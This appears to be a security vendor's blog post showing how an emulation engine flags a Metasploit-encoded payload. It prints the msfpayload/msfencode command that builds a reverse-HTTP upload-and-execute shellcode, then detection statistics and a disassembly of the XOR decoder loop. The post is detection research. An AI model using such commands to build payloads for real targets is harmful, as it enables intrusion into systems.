======== Shellcode generation command ======== msfpayload windows/upexec/reverse_http PEXEC=./ LHOST=127.0.0.1 LPORT=31337 R | msfencode -e x86/jmp_call_additive -t raw======== Payload investigation statistics ======== Suspicious payload offset: 0 Emulation attribute name Value ======================================================= WRITES_TO_PROCESS_STACK_MEMORY 1 ------------------------------------------------------- BUFFER_INSIDE_WRITES_COUNT 19 ------------------------------------------------------- REFERENCES_TO_PROCESS_INTERNALS 0 ------------------------------------------------------- BUFFER_OUTSIDE_WRITES_COUNT 0 ------------------------------------------------------- FAR_JUMPS_COUNT 0 ------------------------------------------------------- FULLY_INITIALIZED_INSTRUCTIONS 100 ------------------------------------------------------- PROVIDED_ABSOLUTE_MEMORY_ADDRESSES 1 ------------------------------------------------------- PROC_CALLS_INSIDE_INV_BUFFER 1 ------------------------------------------------------- BUFFER_OUTSIDE_READS_COUNT 2 ------------------------------------------------------- UNDEFINED_DIRECT_CALLS 0 ------------------------------------------------------- JUMPS_INSIDE_INV_BUFFER 19 ------------------------------------------------------- CORRECTLY_PARSED_INSTRUCTIONS 100 ------------------------------------------------------- MEMORY_MODIFYING_MATH_INSTRUCTIONS 0 ------------------------------------------------------- BUFFER_INSIDE_READS_COUNT 19 ------------------------------------------------------- SYSTEM_CALLS_COUNT 0 ------------------------------------------------------- UNRECOGNIZED_CALL_TARGETS 0 ------------------------------------------------------- REFERENCES_TO_PROCESS_IMPORTS 0 ------------------------------------------------------- CORRECT_PROCEDURES_CALLS 0 ------------------------------------------------------- EIP_RETRIEVAL_INSTRUCTIONS 0 ------------------------------------------------------- JUMPS_TO_PROCESS_INTERNALS 0 ------------------------------------------------------- EXECUTED_ARITHMETIC_INSTRUCTIONS 0 ------------------------------------------------------- CALLS_TARGETED_IMPORTS_SECTION 0 ------------------------------------------------------- UNRECOGNIZED_JUMP_TARGETS 0 ------------------------------------------------------- CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS 2 ------------------------------------------------------- REFERENCES_TO_PROCESS_EXPORTS 0 ------------------------------------------------------- EXECUTES_BITS_OPERATING_INSTRUCTIONS 0 ------------------------------------------------------- IMMEDIATE_OPERANDS_INSTRUCTIONS 0 ------------------------------------------------------- INDIRECT_BUFFER_REFERENCES 2 ------------------------------------------------------- MAX_WRITTEN_MEMORY_BLOCK 0 ------------------------------------------------------- CORRECTLY_EXECUTED_INSTRUCTIONS 100 ------------------------------------------------------- READS_FROM_PROCESS_STACK_MEMORY 1 ------------------------------------------------------- CALLS_TARGETED_EXPORTS_SECTION 0 ------------------------------------------------------- More about quttera investigation engine here
======== Detection disassembly ======== CLD MOV EBX (0x00000000),0x3E26957C JMP 0x0C ;random read instruction CALL 0xBFFCA744 POP ESI (0x00000000) PUSH ESI (0xBFFCA755) XOR DS:[ESI] (0xBFFCA755),EBX (0x3E26957C) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 1 0xBFFCA755 ADD EBX (0x3E26957C),EAX (0x0089E8FC) TEST EAX (0x0089E8FC),EAX (0x0089E8FC) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA759),EBX (0x3EB07E78) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 2 0xBFFCA759 ADD EBX (0x3EB07E78),EAX (0x89600000) TEST EAX (0x89600000),EAX (0x89600000) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA75D),EBX (0xC8107E78) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 3 0xBFFCA75D ADD EBX (0xC8107E78),EAX (0x64D231E5) TEST EAX (0x64D231E5),EAX (0x64D231E5) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA761),EBX (0x2CE2B05D) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 4 0xBFFCA761 ADD EBX (0x2CE2B05D),EAX (0x8B30528B) TEST EAX (0x8B30528B),EAX (0x8B30528B) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA765),EBX (0xB81302E8) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 5 0xBFFCA765 ADD EBX (0xB81302E8),EAX (0x528B0C52) TEST EAX (0x528B0C52),EAX (0x528B0C52) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA769),EBX (0x0A9E0F3A) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 6 0xBFFCA769 ADD EBX (0x0A9E0F3A),EAX (0x28728B14) TEST EAX (0x28728B14),EAX (0x28728B14) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA76D),EBX (0x33109A4E) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 7 0xBFFCA76D ADD EBX (0x33109A4E),EAX (0x264AB70F) TEST EAX (0x264AB70F),EAX (0x264AB70F) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA771),EBX (0x595B515D) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 8 0xBFFCA771 ADD EBX (0x595B515D),EAX (0xC031FF31) TEST EAX (0xC031FF31),EAX (0xC031FF31) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA775),EBX (0x198D508E) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 9 0xBFFCA775 ADD EBX (0x198D508E),EAX (0x7C613CAC) TEST EAX (0x7C613CAC),EAX (0x7C613CAC) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA779),EBX (0x95EE8D3A) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 10 0xBFFCA779 ADD EBX (0x95EE8D3A),EAX (0xC1202C02) TEST EAX (0xC1202C02),EAX (0xC1202C02) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA77D),EBX (0x570EB93C) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 11 0xBFFCA77D ADD EBX (0x570EB93C),EAX (0xC7010DCF) TEST EAX (0xC7010DCF),EAX (0xC7010DCF) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA781),EBX (0x1E0FC70B) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 12 0xBFFCA781 ADD EBX (0x1E0FC70B),EAX (0x5752F0E2) TEST EAX (0x5752F0E2),EAX (0x5752F0E2) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA785),EBX (0x7562B7ED) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 13 0xBFFCA785 ADD EBX (0x7562B7ED),EAX (0x8B10528B) TEST EAX (0x8B10528B),EAX (0x8B10528B) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA789),EBX (0x00730A78) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 14 0xBFFCA789 ADD EBX (0x00730A78),EAX (0xD0013C42) TEST EAX (0xD0013C42),EAX (0xD0013C42) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA78D),EBX (0xD07446BA) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 15 0xBFFCA78D ADD EBX (0xD07446BA),EAX (0x8578408B) TEST EAX (0x8578408B),EAX (0x8578408B) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA791),EBX (0x55EC8745) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 16 0xBFFCA791 ADD EBX (0x55EC8745),EAX (0x014A74C0) TEST EAX (0x014A74C0),EAX (0x014A74C0) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA795),EBX (0x5736FC05) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 17 0xBFFCA795 ADD EBX (0x5736FC05),EAX (0x488B50D0) TEST EAX (0x488B50D0),EAX (0x488B50D0) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA799),EBX (0x9FC24CD5) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 18 0xBFFCA799 ADD EBX (0x9FC24CD5),EAX (0x20588B18) TEST EAX (0x20588B18),EAX (0x20588B18) JNZ 0xF7 ;random read instruction XOR DS:[ESI] (0xBFFCA79D),EBX (0xC01AD7ED) ;investigation buffer write instruction LODSD ; investigation buffer read instruction 19 0xBFFCA79D ADD EBX (0xC01AD7ED),EAX (0x3CE3D301) TEST EAX (0x3CE3D301),EAX (0x3CE3D301)
No comments:
Post a Comment